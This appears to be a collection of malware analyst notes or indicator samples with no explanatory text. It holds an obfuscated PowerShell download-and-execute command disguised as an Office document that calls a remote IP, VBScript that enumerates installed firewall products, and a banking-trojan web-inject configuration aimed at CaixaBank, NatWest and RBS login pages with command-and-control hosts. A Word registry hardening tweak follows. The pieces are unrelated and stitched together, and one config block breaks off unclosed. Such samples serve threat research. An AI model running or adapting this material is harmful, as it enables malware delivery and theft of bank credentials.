Bryan Campbell brycampbell
c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c IEX(New-Object Net.WebClient).DownloadString('http://185.176.221[.]146/download/s/GTz')
# Typical RAT-like behavior using wmic for detection of installed security products
"WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List" (Indicator: "root\cimv2")
"root\cimv2" (Indicator: "root\cimv2")
Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
' Enumerate every firewall product registered with Security Center and emit its display name as a JSON fragment
For Each objItem In colItems
    With objItem
        WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
    End With
Next
<dinj>
<lm>*caixabank.es/particular/*html*</lm>
<hl>http://92.63.105.118/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<sinj>
<mm>https://www.bankline.natwest.com*</mm>
<sm>https://www.bankline.natwest.com/CWSLogon/logon.do*</sm>
<nh>ccsarewkpsmofyibdhqcgvnltzxj.net</nh>
<srv>195.133.144.126:443</srv>
</sinj>
<sinj>
<mm>https://www.bankline.rbs.com*</mm>
<sm>https://www.bankline.rbs.com/CWSLogon/logon.do*</sm>
<nh>cdsarpwtfdxysnmgejvzbicolqku.net</nh>
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001